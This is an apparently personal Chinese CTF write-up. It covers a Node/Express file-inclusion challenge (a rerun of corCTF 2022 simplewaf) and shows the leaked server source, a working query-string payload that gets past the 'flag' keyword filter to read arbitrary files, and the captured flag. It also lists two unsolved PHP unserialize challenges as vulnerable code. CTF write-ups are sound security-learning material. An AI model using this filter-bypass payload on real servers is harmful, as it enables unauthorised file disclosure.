前言
下午睡醒了才想起来有这个比赛,于是在最后的一小时里看了看题
express fs
原题,corCTF 2022的simplewaf
参考wp1:https://cloud.tencent.com/developer/article/2123023
参考wp2:https://www.hackerpoet.com/index.php/archives/1088/
点击进入后发现存在一个文件包含的参数?file
读取/proc/1/cmdline得到文件名称main.js
读取main.js,得到源码
const express = require("express");
const fs = require("fs");
const app = express();
const PORT = process.env.PORT || 80;
app.use('/static', express.static('static'))
app.use((req, res, next) => {
if (
[req.body, req.headers, req.query].some(
(item) => item && JSON.stringify(item).includes("flag")
)
) {
return res.send("臭黑客!");
}
next();
});
app.get("/", (req, res) => {
try {
res.setHeader("Content-Type", "text/html");
res.send(fs.readFileSync(req.query.file || "index.html").toString());
} catch (err) {
console.log(err);
res.status(500).send("Internal server error");
}
});
app.listen(PORT, () => console.log(`express server listening on port ${PORT}`));payload:
?file[href]=aa&file[origin]=aa&file[protocol]=file:&file[hostname]=&file[pathname]=%2566lag.txtflag:flag{ISEC-3d0ad564edfc39ab7b1fe5b845fbbaa4}
反序列化(不会)
PHP版本5.3
<?php
highlight_file(__FILE__);
$flag=file_get_contents('/tmp/flag.txt');
class test{
public function __call($f,$p){
global $flag;
var_dump($flag);
}
}
if(isset($_GET['code']))var_dump(unserialize(base64_decode($_GET['code'])));
?> UAF(不会)
PHP版本5.3
<?php
highlight_file(__FILE__);
if(isset($_GET['code']))var_dump(unserialize(base64_decode($_GET['code'])));
?>